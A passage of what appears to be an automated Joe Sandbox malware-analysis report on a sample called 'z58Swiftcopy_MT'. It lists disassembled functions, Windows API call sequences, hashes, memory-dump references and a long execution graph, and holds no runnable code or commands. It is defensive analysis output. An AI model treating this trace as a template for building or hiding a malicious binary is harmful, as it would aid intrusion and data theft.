                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,33A710DF,?,?,?,00000000), ref: 33A71EC8
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,33A710DF,?,33A710DF,?,?,?,00000000), ref: 33A71ED3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 493641738-0
                                                                                                                                                                                                                                      • Opcode ID: 316a239e2397d3abb7f6ca8a7a72ff1f47878b5676cba3b600b446839d18b6a4
                                                                                                                                                                                                                                      • Instruction ID: c68af64eb7075c211a98699b64ab5d6b24e2b0ff36e3493bf9eb0bcc7c1c3efc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 316a239e2397d3abb7f6ca8a7a72ff1f47878b5676cba3b600b446839d18b6a4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32F082265002107AE62137AAECC5EBF7BBCFFC6B60F44001EFA09A31909B55584393B5
                                                                                                                                                                                                                                      Function 33A715DA Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,33A7190E,?,?,00000000,?,00000000), ref: 33A71643
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,33A7190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 33A7165A
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,33A7190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 33A71661
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,33A7190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 33A71686
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcatlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1475610065-0
                                                                                                                                                                                                                                      • Opcode ID: 6ab25ab75d17c882dc74e788dc81a45f84b0664593e05e916463105779a060c0
                                                                                                                                                                                                                                      • Instruction ID: fb39915a402deb948a21720db4cf9366578faaf547f1f04a72ad2e58d29c4ac1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ab25ab75d17c882dc74e788dc81a45f84b0664593e05e916463105779a060c0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42219536D00304ABDB049BE8DDC5EEE77F8EF88710F24441BE905AB281EB74A54697A5
                                                                                                                                                                                                                                      Function 33A77153 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 33A7715C
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 33A7717F
                                                                                                                                                                                                                                        • Part of subcall function 33A756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 33A75702
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 33A771A5
                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 33A771C7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1794362364-0
                                                                                                                                                                                                                                      • Opcode ID: 99928db140cd1a5a42ecadd91eb17474beb32ec7ce5c6cd7b84a6c96b11c3a03
                                                                                                                                                                                                                                      • Instruction ID: 3d41eaabf09dd3774752e28f3340e590e1a5a25bf726e195a2a61327acc07935
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99928db140cd1a5a42ecadd91eb17474beb32ec7ce5c6cd7b84a6c96b11c3a03
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 050184B7A013157BA7121AFA5CC8D7B7A6DDEC2AA2354012FBD04D7214EE628C0383B0
                                                                                                                                                                                                                                      Function 33A7C7E6 Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 312 33a7c7e6-33a7c7ed GetModuleHandleA 313 33a7c7ef-33a7c7fe call 33a7c803 312->313 314 33a7c82d 312->314 324 33a7c865 313->324 325 33a7c800-33a7c80b GetProcAddress 313->325 315 33a7c82f-33a7c833 314->315 317 33a7c835-33a7c83d GetModuleHandleA 315->317 318 33a7c872 call 33a7c877 315->318 321 33a7c83f-33a7c847 317->321 321->321 323 33a7c849-33a7c84c 321->323 323->315 326 33a7c84e-33a7c850 323->326 328 33a7c866-33a7c86e 324->328 325->314 327 33a7c80d-33a7c81a 325->327 329 33a7c856-33a7c85e 326->329 330 33a7c852-33a7c854 326->330 336 33a7c82c 327->336 337 33a7c81c-33a7c829 327->337 332 33a7c870 328->332 333 33a7c85f-33a7c860 GetProcAddress 329->333 330->333 332->323 333->324 336->314 337->336
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(33A7C7DD), ref: 33A7C7E6
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,33A7C7DD), ref: 33A7C838
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 33A7C860
                                                                                                                                                                                                                                        • Part of subcall function 33A7C803: GetProcAddress.KERNEL32(00000000,33A7C7F4), ref: 33A7C804
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1646373207-0
                                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                      • Instruction ID: 5e75e3aae60746f8cc65efb4c835e753accaa6b730efed7de7aa52eab87df11c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3012E519453503CBB1046F40CC0AAA6F9C9F236A0F180BABEC4096693EAA4C102C3AA
                                                                                                                                                                                                                                      Function 33A75CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,33A71D66,00000000,00000000,?,33A75C88,33A71D66,00000000,00000000,00000000,?,33A75E85,00000006,FlsSetValue), ref: 33A75D13
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,33A75C88,33A71D66,00000000,00000000,00000000,?,33A75E85,00000006,FlsSetValue,33A7E190,FlsSetValue,00000000,00000364,?,33A75BC8), ref: 33A75D1F
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,33A75C88,33A71D66,00000000,00000000,00000000,?,33A75E85,00000006,FlsSetValue,33A7E190,FlsSetValue,00000000), ref: 33A75D2D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                      • Opcode ID: 935b25bf1e37b2f390827cc6e805e4eb6dca23d4e8b956f5345f22bb43336277
                                                                                                                                                                                                                                      • Instruction ID: 22635e0946a00c4fac7f1d82f06c3d8a02e799bfb715a3072b7a13114e159078
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 935b25bf1e37b2f390827cc6e805e4eb6dca23d4e8b956f5345f22bb43336277
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF01717A611322ABD7119AE8DCC8A46779CEF456E1B140725FD0AEB141DB20D803CAE0

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:6.7%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                                      Signature Coverage:3.2%
                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                      Total number of Limit Nodes:80
                                                                                                                                                                                                                                      execution_graph 37632 44dea5 37633 44deb5 FreeLibrary 37632->37633 37634 44dec3 37632->37634 37633->37634 37635 4287c1 37636 4287d2 37635->37636 37639 429ac1 37635->37639 37640 428818 37636->37640 37641 42881f 37636->37641 37651 425711 37636->37651 37637 4259da 37698 416760 11 API calls 37637->37698 37650 425ad6 37639->37650 37705 415c56 11 API calls 37639->37705 37672 42013a 37640->37672 37700 420244 97 API calls 37641->37700 37643 4260dd 37699 424251 120 API calls 37643->37699 37646 4259c2 37646->37650 37692 415c56 11 API calls 37646->37692 37651->37637 37651->37639 37651->37646 37654 422aeb memset memcpy memcpy 37651->37654 37655 429a4d 37651->37655 37661 4260a1 37651->37661 37671 425a38 37651->37671 37688 4227f0 memset memcpy 37651->37688 37689 422b84 15 API calls 37651->37689 37690 422b5d memset memcpy memcpy 37651->37690 37691 422640 13 API calls 37651->37691 37693 4241fc 11 API calls 37651->37693 37694 42413a 90 API calls 37651->37694 37654->37651 37656 429a66 37655->37656 37657 429a9b 37655->37657 37701 415c56 11 API calls 37656->37701 37660 429a96 37657->37660 37703 416760 11 API calls 37657->37703 37704 424251 120 API calls 37660->37704 37697 415c56 11 API calls 37661->37697 37663 429a7a 37702 416760 11 API calls 37663->37702 37671->37646 37695 422640 13 API calls 37671->37695 37696 4226e0 12 API calls 37671->37696 37673 42014c 37672->37673 37676 420151 37672->37676 37715 41e466 97 API calls 37673->37715 37675 420162 37675->37651 37676->37675 37677 4201b3 37676->37677 37678 420229 37676->37678 37679 4201b8 37677->37679 37680 4201dc 37677->37680 37678->37675 37681 41fd5e 86 API calls 37678->37681 37706 41fbdb 37679->37706 37680->37675 37684 4201ff 37680->37684 37712 41fc4c 37680->37712 37681->37675 37684->37675 37687 42013a 97 API calls 37684->37687 37687->37675 37688->37651 37689->37651 37690->37651 37691->37651 37692->37637 37693->37651 37694->37651 37695->37671 37696->37671 37697->37637 37698->37643 37699->37650 37700->37651 37701->37663 37702->37660 37703->37660 37704->37639 37705->37637 37707 41fbf1 37706->37707 37708 41fbf8 37706->37708 37711 41fc39 37707->37711 37730 4446ce 11 API calls 37707->37730 37720 41ee26 37708->37720 37711->37675 37716 41fd5e 37711->37716 37713 41ee6b 86 API calls 37712->37713 37714 41fc5d 37713->37714 37714->37680 37715->37676 37719 41fd65 37716->37719 37717 41fdab 37717->37675 37718 41fbdb 86 API calls 37718->37719 37719->37717 37719->37718 37721 41ee41 37720->37721 37722 41ee32 37720->37722 37731 41edad 37721->37731 37734 4446ce 11 API calls 37722->37734 37726 41ee3c 37726->37707 37728 41ee58 37728->37726 37736 41ee6b 37728->37736 37730->37711 37740 41be52 37731->37740 37734->37726 37735 41eb85 11 API calls 37735->37728 37737 41ee70 37736->37737 37738 41ee78 37736->37738 37793 41bf99 86 API calls 37737->37793 37738->37726 37741 41be6f 37740->37741 37742 41be5f 37740->37742 37747 41be8c 37741->37747 37772 418c63 memset memset 37741->37772 37771 4446ce 11 API calls 37742->37771 37744 41be69 37744->37726 37744->37735 37747->37744 37748 41bf3a 37747->37748 37750 41bed1 37747->37750 37752 41bee7 37747->37752 37775 4446ce 11 API calls 37748->37775 37751 41bef0 37750->37751 37754 41bee2 37750->37754 37751->37752 37753 41bf01 37751->37753 37752->37744 37776 41a453 86 API calls 37752->37776 37755 41bf24 memset 37753->37755 37757 41bf14 37753->37757 37773 418a6d memset memcpy memset 37753->37773 37761 41ac13 37754->37761 37755->37744 37774 41a223 memset memcpy memset 37757->37774 37760 41bf20 37760->37755 37762 41ac3f memset 37761->37762 37763 41ac52 37761->37763 37768 41acd9 37762->37768 37765 41ac6a 37763->37765 37777 41dc14 19 API calls 37763->37777 37766 41aca1 37765->37766 37778 41519d 37765->37778 37766->37768 37769 41acc0 memset 37766->37769 37770 41accd memcpy 37766->37770 37768->37752 37769->37768 37770->37768 37771->37744 37772->37747 37773->37757 37774->37760 37775->37752 37777->37765 37781 4175ed 37778->37781 37789 417570 SetFilePointer 37781->37789 37784 41760a ReadFile 37785 417637 37784->37785 37786 417627 GetLastError 37784->37786 37787 4151b3 37785->37787 37788 41763e memset 37785->37788 37786->37787 37787->37766 37788->37787 37790 4175b2 37789->37790 37791 41759c GetLastError 37789->37791 37790->37784 37790->37787 37791->37790 37792 4175a8 GetLastError 37791->37792 37792->37790 37793->37738 37794 417bc5 37795 417c61 37794->37795 37796 417bda 37794->37796 37796->37795 37797 417bf6 UnmapViewOfFile CloseHandle 37796->37797 37799 417c2c 37796->37799 37801 4175b7 37796->37801 37797->37796 37797->37797 37799->37796 37806 41851e 20 API calls 37799->37806 37802 4175d6 CloseHandle 37801->37802 37803 4175c8 37802->37803 37804 4175df 37802->37804 37803->37804 37805 4175ce Sleep 37803->37805 37804->37796 37805->37802 37806->37799 37807 4152c7 malloc 37808 4152ef 37807->37808 37810 4152e2 37807->37810 37811 416760 11 API calls 37808->37811 37811->37810 37812 4232e8 37813 4232ef 37812->37813 37816 415b2c 37813->37816 37815 423305 37817 415b42 37816->37817 37820 415b46 37816->37820 37818 415b94 37817->37818 37817->37820 37821 415b5a 37817->37821 37823 4438b5 37818->37823 37820->37815 37821->37820 37822 415b79 memcpy 37821->37822 37822->37820 37824 4438d0 37823->37824 37834 4438c9 37823->37834 37837 415378 memcpy memcpy 37824->37837 37834->37820 37838 41276d 37839 41277d 37838->37839 37881 4044a4 LoadLibraryW 37839->37881 37841 412785 37842 412789 37841->37842 37889 414b81 37841->37889 37845 4127c8 37895 412465 memset ??2@YAPAXI 37845->37895 37847 4127ea 37907 40ac21 37847->37907 37852 412813 37925 40dd07 memset 37852->37925 37853 412827 37930 40db69 memset 37853->37930 37856 412822 37951 4125b6 ??3@YAXPAX 37856->37951 37858 40ada2 _wcsicmp 37860 41283d 37858->37860 37860->37856 37863 412863 CoInitialize 37860->37863 37935 41268e 37860->37935 37955 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37863->37955 37866 41296f 37957 40b633 37866->37957 37868 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37873 412957 CoUninitialize 37868->37873 37878 4128ca 37868->37878 37873->37856 37874 4128d0 TranslateAcceleratorW 37875 412941 GetMessageW 37874->37875 37874->37878 37875->37873 37875->37874 37876 412909 IsDialogMessageW 37876->37875 37876->37878 37877 4128fd IsDialogMessageW 37877->37875 37877->37876 37878->37874 37878->37876 37878->37877 37879 41292b TranslateMessage DispatchMessageW 37878->37879 37880 41291f IsDialogMessageW 37878->37880 37879->37875 37880->37875 37880->37879 37882 4044f7 37881->37882 37883 4044cf GetProcAddress 37881->37883 37887 404507 MessageBoxW 37882->37887 37888 40451e 37882->37888 37884 4044e8 FreeLibrary 37883->37884 37885 4044df 37883->37885 37884->37882 37886 4044f3 37884->37886 37885->37884 37886->37882 37887->37841 37888->37841 37890 414b8a 37889->37890 37891 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37889->37891 37961 40a804 memset 37890->37961 37891->37845 37894 414b9e GetProcAddress 37894->37891 37896 4124e0 37895->37896 37897 412505 ??2@YAPAXI 37896->37897 37898 412521 37897->37898 37899 41251c 37897->37899 37972 444722 37898->37972 37983 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37899->37983 37906 41259b wcscpy 37906->37847 37988 40b1ab free free 37907->37988 37909 40ad76 37989 40aa04 37909->37989 37912 40a9ce malloc memcpy free free 37915 40ac5c 37912->37915 37913 40ad4b 37913->37909 38012 40a9ce 37913->38012 37915->37909 37915->37912 37915->37913 37916 40ace7 free 37915->37916 37992 40a8d0 37915->37992 38004 4099f4 37915->38004 37916->37915 37920 40a8d0 7 API calls 37920->37909 37921 40ada2 37922 40adc9 37921->37922 37923 40adaa 37921->37923 37922->37852 37922->37853 37923->37922 37924 40adb3 _wcsicmp 37923->37924 37924->37922 37924->37923 38017 40dce0 37925->38017 37927 40dd3a GetModuleHandleW 38022 40dba7 37927->38022 37931 40dce0 3 API calls 37930->37931 37932 40db99 37931->37932 38094 40dae1 37932->38094 38108 402f3a 37935->38108 37937 412766 37937->37856 37937->37863 37938 4126d3 _wcsicmp 37939 4126a8 37938->37939 37939->37937 37939->37938 37941 41270a 37939->37941 38143 4125f8 7 API calls 37939->38143 37941->37937 38111 411ac5 37941->38111 37952 4125da 37951->37952 37953 4125f0 37952->37953 37954 4125e6 DeleteObject 37952->37954 37956 40b1ab free free 37953->37956 37954->37953 37955->37868 37956->37866 37958 40b640 37957->37958 37959 40b639 free 37957->37959 37960 40b1ab free free 37958->37960 37959->37958 37960->37842 37962 40a83b GetSystemDirectoryW 37961->37962 37963 40a84c wcscpy 37961->37963 37962->37963 37968 409719 wcslen 37963->37968 37966 40a881 LoadLibraryW 37967 40a886 37966->37967 37967->37891 37967->37894 37969 409724 37968->37969 37970 409739 wcscat LoadLibraryW 37968->37970 37969->37970 37971 40972c wcscat 37969->37971 37970->37966 37970->37967 37971->37970 37973 444732 37972->37973 37974 444728 DeleteObject 37972->37974 37984 409cc3 37973->37984 37974->37973 37976 412551 37977 4010f9 37976->37977 37978 401130 37977->37978 37979 401134 GetModuleHandleW LoadIconW 37978->37979 37980 401107 wcsncat 37978->37980 37981 40a7be 37979->37981 37980->37978 37982 40a7d2 37981->37982 37982->37906 37982->37982 37983->37898 37987 409bfd memset wcscpy 37984->37987 37986 409cdb CreateFontIndirectW 37986->37976 37987->37986 37988->37915 37990 40aa14 37989->37990 37991 40aa0a free 37989->37991 37990->37921 37991->37990 37993 40a8eb 37992->37993 37994 40a8df wcslen 37992->37994 37995 40a906 free 37993->37995 37996 40a90f 37993->37996 37994->37993 37997 40a919 37995->37997 37998 4099f4 3 API calls 37996->37998 37999 40a932 37997->37999 38000 40a929 free 37997->38000 37998->37997 38002 4099f4 3 API calls 37999->38002 38001 40a93e memcpy 38000->38001 38001->37915 38003 40a93d 38002->38003 38003->38001 38005 409a41 38004->38005 38006 4099fb malloc 38004->38006 38005->37915 38008 409a37 38006->38008 38009 409a1c 38006->38009 38008->37915 38010 409a30 free 38009->38010 38011 409a20 memcpy 38009->38011 38010->38008 38011->38010 38013 40a9e7 38012->38013 38014 40a9dc free 38012->38014 38015 4099f4 3 API calls 38013->38015 38016 40a9f2 38014->38016 38015->38016 38016->37920 38041 409bca GetModuleFileNameW 38017->38041 38019 40dce6 wcsrchr 38020 40dcf5 38019->38020 38021 40dcf9 wcscat 38019->38021 38020->38021 38021->37927 38042 44db70 38022->38042 38024 40dbb4 memset memset 38044 409bca GetModuleFileNameW 38024->38044 38026 40dbfd 38045 4447d9 38026->38045 38029 40dc34 wcscpy wcscpy 38071 40d6f5 38029->38071 38030 40dc1f wcscpy 38030->38029 38033 40d6f5 3 API calls 38034 40dc73 38033->38034 38035 40d6f5 3 API calls 38034->38035 38036 40dc89 38035->38036 38037 40d6f5 3 API calls 38036->38037 38038 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38037->38038 38077 40da80 38038->38077 38041->38019 38043 44db77 38042->38043 38043->38024 38043->38043 38044->38026 38047 4447f4 38045->38047 38046 40dc1b 38046->38029 38046->38030 38047->38046 38048 444807 ??2@YAPAXI 38047->38048 38049 44481f 38048->38049 38050 444873 _snwprintf 38049->38050 38051 4448ab wcscpy 38049->38051 38084 44474a 8 API calls 38050->38084 38053 4448bb 38051->38053 38085 44474a 8 API calls 38053->38085 38054 4448a7 38054->38051 38054->38053 38056 4448cd 38086 44474a 8 API calls 38056->38086 38058 4448e2 38087 44474a 8 API calls 38058->38087 38060 4448f7 38088 44474a 8 API calls 38060->38088 38062 44490c 38089 44474a 8 API calls 38062->38089 38064 444921 38090 44474a 8 API calls 38064->38090 38066 444936 38091 44474a 8 API calls 38066->38091 38068 44494b 38092 44474a 8 API calls 38068->38092 38070 444960 ??3@YAXPAX 38070->38046 38072 44db70 38071->38072 38073 40d702 memset GetPrivateProfileStringW 38072->38073 38074 40d752 38073->38074 38075 40d75c WritePrivateProfileStringW 38073->38075 38074->38075 38076 40d758 38074->38076 38075->38076 38076->38033 38078 44db70 38077->38078 38079 40da8d memset 38078->38079 38080 40daac LoadStringW 38079->38080 38083 40dac6 38080->38083 38082 40dade 38082->37856 38083->38080 38083->38082 38093 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38083->38093 38084->38054 38085->38056 38086->38058 38087->38060 38088->38062 38089->38064 38090->38066 38091->38068 38092->38070 38093->38083 38104 409b98 GetFileAttributesW 38094->38104 38096 40daea 38097 40daef wcscpy wcscpy GetPrivateProfileIntW 38096->38097 38103 40db63 38096->38103 38105 40d65d GetPrivateProfileStringW 38097->38105 38099 40db3e 38106 40d65d GetPrivateProfileStringW 38099->38106 38101 40db4f 38107 40d65d GetPrivateProfileStringW 38101->38107 38103->37858 38104->38096 38105->38099 38106->38101 38107->38103 38144 40eaff 38108->38144 38112 411ae2 memset 38111->38112 38113 411b8f 38111->38113 38184 409bca GetModuleFileNameW 38112->38184 38125 411a8b 38113->38125 38115 411b0a wcsrchr 38116 411b22 wcscat 38115->38116 38117 411b1f 38115->38117 38185 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38116->38185 38117->38116 38119 411b67 38186 402afb 38119->38186 38123 411b7f 38242 40ea13 SendMessageW memset SendMessageW 38123->38242 38126 402afb 27 API calls 38125->38126 38127 411ac0 38126->38127 38128 4110dc 38127->38128 38129 41113e 38128->38129 38134 4110f0 38128->38134 38267 40969c LoadCursorW SetCursor 38129->38267 38131 411143 38268 444a54 38131->38268 38271 4032b4 38131->38271 38289 40b1ab free free 38131->38289 38132 4110f7 _wcsicmp 38132->38134 38133 411157 38135 40ada2 _wcsicmp 38133->38135 38134->38129 38134->38132 38290 410c46 10 API calls 38134->38290 38138 411167 38135->38138 38136 4111af 38138->38136 38139 4111a6 qsort 38138->38139 38139->38136 38143->37939 38145 40eb10 38144->38145 38157 40e8e0 38145->38157 38148 40eb6c memcpy memcpy 38149 40ebb7 38148->38149 38149->38148 38150 40ebf2 ??2@YAPAXI ??2@YAPAXI 38149->38150 38153 40d134 16 API calls 38149->38153 38151 40ec2e ??2@YAPAXI 38150->38151 38152 40ec65 38150->38152 38151->38152 38167 40ea7f 38152->38167 38153->38149 38156 402f49 38156->37939 38158 40e8f2 38157->38158 38159 40e8eb ??3@YAXPAX 38157->38159 38160 40e900 38158->38160 38161 40e8f9 ??3@YAXPAX 38158->38161 38159->38158 38162 40e911 38160->38162 38163 40e90a ??3@YAXPAX 38160->38163 38161->38160 38164 40e931 ??2@YAPAXI ??2@YAPAXI 38162->38164 38165 40e921 ??3@YAXPAX 38162->38165 38166 40e92a ??3@YAXPAX 38162->38166 38163->38162 38164->38148 38165->38166 38166->38164 38168 40aa04 free 38167->38168 38169 40ea88 38168->38169 38170 40aa04 free 38169->38170 38171 40ea90 38170->38171 38172 40aa04 free 38171->38172 38173 40ea98 38172->38173 38174 40aa04 free 38173->38174 38175 40eaa0 38174->38175 38176 40a9ce 4 API calls 38175->38176 38177 40eab3 38176->38177 38178 40a9ce 4 API calls 38177->38178 38179 40eabd 38178->38179 38180 40a9ce 4 API calls 38179->38180 38181 40eac7 38180->38181 38182 40a9ce 4 API calls 38181->38182 38183 40ead1 38182->38183 38183->38156 38184->38115 38185->38119 38243 40b2cc 38186->38243 38188 402b0a 38189 40b2cc 27 API calls 38188->38189 38190 402b23 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402b3a 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402b54 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402b6b 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402b82 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402b99 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402bb0 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402bc7 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402bde 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402bf5 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402c0c 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402c23 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402c3a 38213->38214 38215 40b2cc 27 API calls 38214->38215 38216 402c51 38215->38216 38217 40b2cc 27 API calls 38216->38217 38218 402c68 38217->38218 38219 40b2cc 27 API calls 38218->38219 38220 402c7f 38219->38220 38221 40b2cc 27 API calls 38220->38221 38222 402c99 38221->38222 38223 40b2cc 27 API calls 38222->38223 38224 402cb3 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402cd5 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402cf0 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402d0b 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402d26 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402d3e 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402d59 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402d78 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402d93 38239->38240 38241 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38240->38241 38241->38123 38242->38113 38246 40b58d 38243->38246 38245 40b2d1 38245->38188 38247 40b5a4 GetModuleHandleW FindResourceW 38246->38247 38248 40b62e 38246->38248 38249 40b5c2 LoadResource 38247->38249 38251 40b5e7 38247->38251 38248->38245 38250 40b5d0 SizeofResource LockResource 38249->38250 38249->38251 38250->38251 38251->38248 38259 40afcf 38251->38259 38253 40b608 memcpy 38262 40b4d3 memcpy 38253->38262 38255 40b61e 38263 40b3c1 18 API calls 38255->38263 38257 40b626 38264 